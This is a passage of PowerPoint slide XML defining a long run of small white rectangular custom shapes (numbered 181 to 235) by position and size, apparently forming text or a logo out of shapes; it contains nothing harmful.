            <a:ext cx="21960" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="CustomShape 181"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9489960" y="4559400"/>
            <a:ext cx="28080" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="CustomShape 182"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9524880" y="4567320"/>
            <a:ext cx="4320" cy="29880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="CustomShape 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9550440" y="4559400"/>
            <a:ext cx="41040" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="CustomShape 184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9599760" y="4559400"/>
            <a:ext cx="4320" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="CustomShape 185"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9607680" y="4557600"/>
            <a:ext cx="21960" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="CustomShape 186"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9632880" y="4557600"/>
            <a:ext cx="21960" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="CustomShape 187"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9663120" y="4559400"/>
            <a:ext cx="2880" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="CustomShape 188"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9675720" y="4559400"/>
            <a:ext cx="26640" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="CustomShape 189"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9712440" y="4557600"/>
            <a:ext cx="39240" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="CustomShape 190"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9302760" y="4492800"/>
            <a:ext cx="34560" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="CustomShape 191"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9345600" y="4492800"/>
            <a:ext cx="37800" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="CustomShape 192"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9391680" y="4492800"/>
            <a:ext cx="31320" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="CustomShape 193"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9429840" y="4492800"/>
            <a:ext cx="21960" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="CustomShape 194"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9458280" y="4502160"/>
            <a:ext cx="4320" cy="29880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="CustomShape 195"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9488520" y="4492800"/>
            <a:ext cx="9000" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="CustomShape 196"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9513720" y="4492800"/>
            <a:ext cx="21960" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="CustomShape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9540720" y="4492800"/>
            <a:ext cx="23400" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="CustomShape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569520" y="4492800"/>
            <a:ext cx="25200" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="CustomShape 199"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9596520" y="4516560"/>
            <a:ext cx="14040" cy="1080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="CustomShape 200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9615600" y="4492800"/>
            <a:ext cx="21960" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="CustomShape 201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9642600" y="4492800"/>
            <a:ext cx="25200" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="CustomShape 202"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9671040" y="4492800"/>
            <a:ext cx="20160" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="CustomShape 203"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9701280" y="4492800"/>
            <a:ext cx="7560" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="CustomShape 204"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9306000" y="4427640"/>
            <a:ext cx="15480" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="CustomShape 205"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9325080" y="4427640"/>
            <a:ext cx="36000" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="CustomShape 206"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9363240" y="4427640"/>
            <a:ext cx="20160" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="CustomShape 207"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9388440" y="4427640"/>
            <a:ext cx="20160" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="CustomShape 208"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9428040" y="4427640"/>
            <a:ext cx="29880" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="CustomShape 209"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9462960" y="4427640"/>
            <a:ext cx="36000" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="CustomShape 210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9502920" y="4427640"/>
            <a:ext cx="41040" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="CustomShape 211"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9553680" y="4427640"/>
            <a:ext cx="20160" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="CustomShape 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9580680" y="4437000"/>
            <a:ext cx="4320" cy="26640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="CustomShape 213"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9617040" y="4427640"/>
            <a:ext cx="23400" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="CustomShape 214"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9645480" y="4427640"/>
            <a:ext cx="42480" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="CustomShape 215"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9693360" y="4427640"/>
            <a:ext cx="4320" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="CustomShape 216"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9702720" y="4427640"/>
            <a:ext cx="20160" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="CustomShape 217"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9728280" y="4427640"/>
            <a:ext cx="28080" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="CustomShape 218"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9306000" y="4362480"/>
            <a:ext cx="26640" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="CustomShape 219"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9340920" y="4362480"/>
            <a:ext cx="34560" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="CustomShape 220"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9379080" y="4362480"/>
            <a:ext cx="42480" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="CustomShape 221"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9428040" y="4362480"/>
            <a:ext cx="20160" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="CustomShape 222"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9455040" y="4371840"/>
            <a:ext cx="7560" cy="28080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="CustomShape 223"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9510840" y="4362480"/>
            <a:ext cx="18720" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="CustomShape 224"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536040" y="4361040"/>
            <a:ext cx="39240" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="CustomShape 225"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9582120" y="4362480"/>
            <a:ext cx="25200" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="CustomShape 226"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9617040" y="4362480"/>
            <a:ext cx="29880" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="CustomShape 227"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9956880" y="4842000"/>
            <a:ext cx="60120" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="CustomShape 228"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10028160" y="4840200"/>
            <a:ext cx="74160" cy="72720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="CustomShape 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10112400" y="4840200"/>
            <a:ext cx="68040" cy="72720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="CustomShape 230"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10196640" y="4842000"/>
            <a:ext cx="45720" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="CustomShape 231"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10256760" y="4842000"/>
            <a:ext cx="80640" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="CustomShape 232"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10352160" y="4842000"/>
            <a:ext cx="37800" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="CustomShape 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10402920" y="4842000"/>
            <a:ext cx="55080" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="CustomShape 234"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10469520" y="4842000"/>
            <a:ext cx="39240" cy="70920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="CustomShape 235"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10510920" y="4840200"/>
            <a:ext cx="41040" cy="72720"/>
          </a:xfrm>
